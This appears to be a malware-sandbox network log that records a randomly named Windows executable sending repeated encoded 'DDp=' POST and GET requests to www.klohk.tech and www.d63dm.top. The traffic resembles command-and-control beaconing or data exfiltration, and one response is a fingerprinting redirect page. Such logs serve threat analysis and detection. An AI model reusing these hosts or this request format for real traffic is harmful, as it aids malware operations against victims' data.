                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.650005103.224.182.242804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:06.764895916 CET801OUTPOST /3m3e/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.klohk.tech
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.klohk.tech
                                                                                                        Referer: http://www.klohk.tech/3m3e/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 4e 45 55 51 6e 71 39 53 61 62 37 6d 7a 75 51 52 45 34 53 66 75 52 79 78 62 65 66 58 75 77 35 6d 2f 6e 59 37 44 63 52 59 36 78 35 39 56 78 53 71 58 57 45 69 2b 2f 78 57 4f 34 4e 4b 4e 6d 6a 56 79 6f 73 79 49 34 34 37 48 4e 35 61 47 51 76 4e 6b 48 59 76 47 2b 6b 7a 62 6c 70 72 70 68 4d 77 75 41 36 38 4f 54 76 74 38 5a 41 61 77 37 31 52 63 47 36 58 32 2b 49 51 61 62 30 56 32 6b 74 6f 54 70 33 79 72 4c 78 76 69 7a 4e 76 67 53 79 30 44 73 47 5a 76 34 6b 51 39 42 66 36 52 39 35 79 6d 78 6b 49 61 41 61 54 73 73 74 56 46 6f 44 44 79 4f 45 42 4b 75 41 58 47 2b 72 76 6b 44 68 76 44 34 6a 49 65 32 78 36 42 6d 30 2b
                                                                                                        Data Ascii: DDp=NEUQnq9Sab7mzuQRE4SfuRyxbefXuw5m/nY7DcRY6x59VxSqXWEi+/xWO4NKNmjVyosyI447HN5aGQvNkHYvG+kzblprphMwuA68OTvt8ZAaw71RcG6X2+IQab0V2ktoTp3yrLxvizNvgSy0DsGZv4kQ9Bf6R95ymxkIaAaTsstVFoDDyOEBKuAXG+rvkDhvD4jIe2x6Bm0+
                                                                                                        Nov 6, 2024 08:41:07.425868988 CET871INHTTP/1.1 200 OK
                                                                                                        date: Wed, 06 Nov 2024 07:41:07 GMT
                                                                                                        server: Apache
                                                                                                        set-cookie: __tad=1730878867.8996817; expires=Sat, 04-Nov-2034 07:41:07 GMT; Max-Age=315360000
                                                                                                        vary: Accept-Encoding
                                                                                                        content-encoding: gzip
                                                                                                        content-length: 576
                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                        connection: close
                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 [TRUNCATED]
                                                                                                        Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.650006103.224.182.242804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:09.315457106 CET825OUTPOST /3m3e/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.klohk.tech
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.klohk.tech
                                                                                                        Referer: http://www.klohk.tech/3m3e/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 4e 45 55 51 6e 71 39 53 61 62 37 6d 77 4e 59 52 49 2f 47 66 35 68 79 32 65 65 66 58 37 67 35 69 2f 6e 45 37 44 66 64 32 39 45 4a 39 56 51 69 71 55 58 45 69 39 2f 78 57 47 59 4d 41 44 47 69 62 79 6f 78 52 49 36 63 37 48 4f 46 61 47 52 66 4e 6b 32 59 73 58 2b 6b 78 58 46 70 70 30 78 4d 77 75 41 36 38 4f 53 4c 54 38 5a 6f 61 78 4b 46 52 63 6e 36 55 2f 65 49 50 64 62 30 56 79 6b 74 6b 54 70 32 56 72 4b 64 4a 69 31 42 76 67 58 65 30 44 65 75 57 32 49 6b 65 69 78 65 39 63 63 6b 33 6f 79 6c 46 52 68 36 67 2f 38 46 71 45 65 65 5a 75 39 45 69 59 2b 67 56 47 38 7a 64 6b 6a 68 46 42 34 62 49 4d 68 39 64 4f 53 52 64 37 39 69 78 30 6f 46 61 47 6c 56 4a 45 59 72 47 54 43 6b 34 4d 41 3d 3d
                                                                                                        Data Ascii: DDp=NEUQnq9Sab7mwNYRI/Gf5hy2eefX7g5i/nE7Dfd29EJ9VQiqUXEi9/xWGYMADGibyoxRI6c7HOFaGRfNk2YsX+kxXFpp0xMwuA68OSLT8ZoaxKFRcn6U/eIPdb0VyktkTp2VrKdJi1BvgXe0DeuW2Ikeixe9cck3oylFRh6g/8FqEeeZu9EiY+gVG8zdkjhFB4bIMh9dOSRd79ix0oFaGlVJEYrGTCk4MA==
                                                                                                        Nov 6, 2024 08:41:09.973614931 CET871INHTTP/1.1 200 OK
                                                                                                        date: Wed, 06 Nov 2024 07:41:09 GMT
                                                                                                        server: Apache
                                                                                                        set-cookie: __tad=1730878869.5521474; expires=Sat, 04-Nov-2034 07:41:09 GMT; Max-Age=315360000
                                                                                                        vary: Accept-Encoding
                                                                                                        content-encoding: gzip
                                                                                                        content-length: 576
                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                        connection: close
                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 [TRUNCATED]
                                                                                                        Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.650007103.224.182.242804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:11.865485907 CET1838OUTPOST /3m3e/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.klohk.tech
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.klohk.tech
                                                                                                        Referer: http://www.klohk.tech/3m3e/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 4e 45 55 51 6e 71 39 53 61 62 37 6d 77 4e 59 52 49 2f 47 66 35 68 79 32 65 65 66 58 37 67 35 69 2f 6e 45 37 44 66 64 32 39 45 42 39 56 69 61 71 53 45 73 69 38 2f 78 57 61 49 4d 4e 44 47 6a 48 79 6f 6f 59 49 36 51 46 48 49 42 61 47 7a 58 4e 69 43 73 73 4f 75 6b 78 66 6c 70 71 70 68 4d 70 75 41 71 34 4f 53 62 54 38 5a 6f 61 78 4a 64 52 65 32 36 55 35 65 49 51 61 62 30 6e 32 6b 73 7a 54 74 54 71 72 4b 70 2f 2b 56 68 76 67 32 79 30 51 37 61 57 2b 49 6b 63 68 78 65 66 63 63 6f 38 6f 79 35 7a 52 68 4f 5a 2f 37 31 71 45 70 50 6c 79 5a 4a 2b 42 73 49 50 61 2b 72 6c 68 6b 52 46 59 34 6a 52 4a 51 6c 42 4b 78 6c 74 33 4b 43 76 69 75 55 5a 47 55 4a 2b 4d 4f 65 58 61 79 4e 2f 51 41 39 4f 57 5a 64 52 2f 33 50 54 75 32 52 58 71 62 4e 53 64 6d 42 6b 44 72 42 74 33 4e 68 79 7a 59 56 62 47 30 50 73 5a 2f 59 43 77 36 35 67 50 38 44 51 67 55 44 45 4e 45 44 71 4b 2b 56 38 51 58 49 62 51 63 31 39 48 64 65 51 58 6f 42 4c 65 6f 75 50 58 73 6e 67 54 58 75 4e 33 46 2f 38 2b 4d 39 4e 69 67 46 50 79 6b 71 63 51 39 [TRUNCATED]
                                                                                                        Data Ascii: DDp=NEUQnq9Sab7mwNYRI/Gf5hy2eefX7g5i/nE7Dfd29EB9ViaqSEsi8/xWaIMNDGjHyooYI6QFHIBaGzXNiCssOukxflpqphMpuAq4OSbT8ZoaxJdRe26U5eIQab0n2kszTtTqrKp/+Vhvg2y0Q7aW+Ikchxefcco8oy5zRhOZ/71qEpPlyZJ+BsIPa+rlhkRFY4jRJQlBKxlt3KCviuUZGUJ+MOeXayN/QA9OWZdR/3PTu2RXqbNSdmBkDrBt3NhyzYVbG0PsZ/YCw65gP8DQgUDENEDqK+V8QXIbQc19HdeQXoBLeouPXsngTXuN3F/8+M9NigFPykqcQ9HDdpl6WkoG1Kd7oasoV4rkzoIv+2MBs6Wj/+XlquWk5O19Jo3v/VjWdxHVsVkGYvPSjpCbAHrQAh1LTjgXioS8czhE+Ndh53aslHe5jRmxmx8oBHPDLgcNVXdMMtH66IZp6jm9dGuV1WGKp/9aJtRc8HdYeZbCqqefJscl69KTjDICYE1QRGnm2GKm1X4g1VQD/doWqDvhdsneE+V5jWehLc1TEuh9/JKYKMTvbsFHbnW2O21gmj+xZQBN9DmaHa9w/iBekPG2AuyjvJ9qRzPjCi5KCajVnyQBbPskVD4Qsd/sTEysrmBVrP8262wkhJjYtyzNhXhJxl+axmlB0AQDH1XUdAqQWcSdvhBWRi475QiFpzWlDJqdTi+uPlxCAtkkF5MX9rHXEXbZgAAMgxbEi0pTGY2UuFHWHc6abgdA4RBT5bfWx3fR2MxWDB6VMnMIXwncB9Z4rAYL3ve63a3J7REjbTp8sBzSH0dgJDZ+X84T/L7X2hK2nfwJxt+OXuyzape/C8cWd8ZEcHgrY7IRVU+VSiNAZZ5p5Q5aPrzNIiySoO2BEuQ9YtqmYZHd2mdlJEl55S9zojGYb+rBH/bnrz+/WCXmuXnxHoPYZ2PXMLnE/oA+Ihd2Z/1pa4reCkMv8HJQa0uK4I7mVkOAfE0iq543YAJsVUyO [TRUNCATED]
                                                                                                        Nov 6, 2024 08:41:12.519090891 CET871INHTTP/1.1 200 OK
                                                                                                        date: Wed, 06 Nov 2024 07:41:12 GMT
                                                                                                        server: Apache
                                                                                                        set-cookie: __tad=1730878872.4430285; expires=Sat, 04-Nov-2034 07:41:12 GMT; Max-Age=315360000
                                                                                                        vary: Accept-Encoding
                                                                                                        content-encoding: gzip
                                                                                                        content-length: 576
                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                        connection: close
                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 b9 6d 6d b3 cd 08 55 53 e4 e7 48 54 78 e5 74 4f 40 c7 1e 45 4c 78 47 f9 46 ee e5 39 1a 83 77 4a c4 f9 c6 e7 b5 36 6b 74 bd d3 86 72 ad 6b cc 3a 6d b2 8d 8f cb 22 3f 63 5f 4b 55 46 7b e9 c0 61 a5 1d 2a fa d9 6a b3 05 01 49 43 d4 2f f2 fc 70 38 64 cf ea f2 79 37 c7 fc 43 b2 8c a2 3c 87 5b 24 90 40 ba 43 bb 23 b0 35 cc 67 33 e8 b4 72 d6 a3 b2 a6 f2 40 16 f0 0e d5 8e 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 de 19 45 da 1a 3e 6e db 95 54 db 9b 31 55 3a 85 fb 68 72 d0 a6 b2 87 ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f 97 49 dd 8b ab f7 c9 74 19 9d a2 88 dc 31 30 59 a5 27 70 95 fb 3e 9a 10 e0 91 c6 4d fa 67 b5 37 c1 20 f3 27 a1 61 75 ff 6d d4 2c e0 d3 b3 93 2f b7 ac 43 56 e9 7d 67 8d 26 cb a1 f5 22 c8 f6 78 0a cc 27 56 [TRUNCATED]
                                                                                                        Data Ascii: TMo0=pvNl;a"[$&iPrm:]lQebmmUSHTxtO@ELxGF9wJ6ktrk:m"?c_KUF{a*jIC/p8dy7C<[$@C#5g3r@%@@;i1[umLE>nT1U:hrJTo7OIt10Y'p>Mg7 'aum,/CV}g&"x'V4d=ekd;8L]K~,`'<#j9TRnz>v2!>cUsCCW_yae+n4k5'`bxjlk/a&aI=?.X,$4k0OV[h0C^\;DLl?n)1;y


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.650008103.224.182.242804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:14.405353069 CET547OUTGET /3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0= HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.klohk.tech
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:41:15.086507082 CET1236INHTTP/1.1 200 OK
                                                                                                        date: Wed, 06 Nov 2024 07:41:14 GMT
                                                                                                        server: Apache
                                                                                                        set-cookie: __tad=1730878874.4830390; expires=Sat, 04-Nov-2034 07:41:14 GMT; Max-Age=315360000
                                                                                                        vary: Accept-Encoding
                                                                                                        content-length: 1517
                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                        connection: close
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6b 6c 6f 68 6b 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6c 6f 68 6b 2e 74 65 63 68 2f 33 6d 33 65 2f 3f 53 76 72 4c 59 3d 33 50 38 6c 41 4c 41 26 44 44 70 3d 41 47 38 77 6b 63 31 32 44 34 4f 34 71 66 45 33 64 63 32 5a 70 55 4b 50 52 5a 79 70 32 67 52 75 2b 30 6b 36 45 74 46 62 35 55 6c 75 66 51 2b 6c 56 58 46 52 2f 39 67 65 50 70 51 6a 43 47 4b 61 2f 5a 73 51 4a 34 4d 59 4b 63 4a 6d 41 78 72 66 6a 6c 34 63 44 39 42 50 57 6d 68 75 70 68 34 75 74 69 57 33 44 68 76 30 30 4f 73 34 7a 2b 31 64 52 6e 36 57 2b 64 4d 71 62 5a 30 73 [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>klohk.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor=
                                                                                                        Nov 6, 2024 08:41:15.086530924 CET553INData Raw: 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6c 6f 68 6b 2e 74 65
                                                                                                        Data Ascii: "#ffffff" text="#000000"><div style='display: none;'><a href='http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.650009154.23.184.218804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:20.776249886 CET798OUTPOST /rqnz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.d63dm.top
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.d63dm.top
                                                                                                        Referer: http://www.d63dm.top/rqnz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 61 66 6f 73 42 6b 32 31 64 2f 51 45 53 44 4e 43 6a 79 46 4c 57 38 33 37 47 37 77 48 33 2f 44 44 68 7a 43 5a 52 31 4e 38 43 58 74 67 2b 67 4b 2b 34 4f 6d 37 74 73 71 65 33 62 4d 68 4f 62 49 33 38 50 76 7a 37 46 61 55 6a 61 30 2f 62 66 53 47 56 39 2b 2b 57 4a 42 6b 68 4a 6f 2b 6f 39 56 78 76 7a 65 39 72 68 70 67 36 2b 76 4b 4f 68 61 50 62 54 79 73 4b 35 70 5a 4f 73 74 32 32 42 38 69 54 45 4d 68 44 48 55 7a 4f 53 4a 4c 6a 59 6c 65 52 44 49 6d 50 74 39 64 6a 54 4a 68 47 31 71 36 7a 50 39 58 77 46 37 6a 37 36 6f 65 75 48 55 44 70 42 61 4a 47 41 69 39 42 48 4c 4e 4d 4f 33 4f
                                                                                                        Data Ascii: DDp=24JOOXJ8e4hNafosBk21d/QESDNCjyFLW837G7wH3/DDhzCZR1N8CXtg+gK+4Om7tsqe3bMhObI38Pvz7FaUja0/bfSGV9++WJBkhJo+o9Vxvze9rhpg6+vKOhaPbTysK5pZOst22B8iTEMhDHUzOSJLjYleRDImPt9djTJhG1q6zP9XwF7j76oeuHUDpBaJGAi9BHLNMO3O
                                                                                                        Nov 6, 2024 08:41:21.718147039 CET302INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:41:21 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 138
                                                                                                        Connection: close
                                                                                                        ETag: "669137aa-8a"
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.650010154.23.184.218804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:41:23.326683998 CET822OUTPOST /rqnz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.d63dm.top
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.d63dm.top
                                                                                                        Referer: http://www.d63dm.top/rqnz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 62 2f 59 73 4f 6c 32 31 49 50 51 48 64 6a 4e 43 6f 53 46 50 57 38 72 37 47 36 45 58 33 73 6e 44 68 53 79 5a 51 78 5a 38 46 58 74 67 78 41 4b 33 31 75 6d 4b 74 73 57 57 33 61 41 68 4f 62 73 33 38 4f 66 7a 34 79 47 54 69 4b 30 35 55 2f 53 45 4b 74 2b 2b 57 4a 42 6b 68 4a 73 59 6f 39 74 78 76 6d 4f 39 78 45 56 6a 30 65 76 4a 65 78 61 50 4b 44 79 6f 4b 35 70 6e 4f 74 68 50 32 48 67 69 54 41 49 68 44 56 38 77 46 53 4a 4e 73 34 6c 41 58 7a 68 71 41 73 59 72 67 54 4d 48 64 6e 61 67 79 35 67 4e 73 32 37 41 70 71 49 63 75 46 4d 78 70 68 61 6a 45 41 61 39 54 51 48 71 44 36 53 74 57 73 39 68 6c 41 57 51 4d 6b 56 49 73 34 61 70 58 65 50 71 42 77 3d 3d
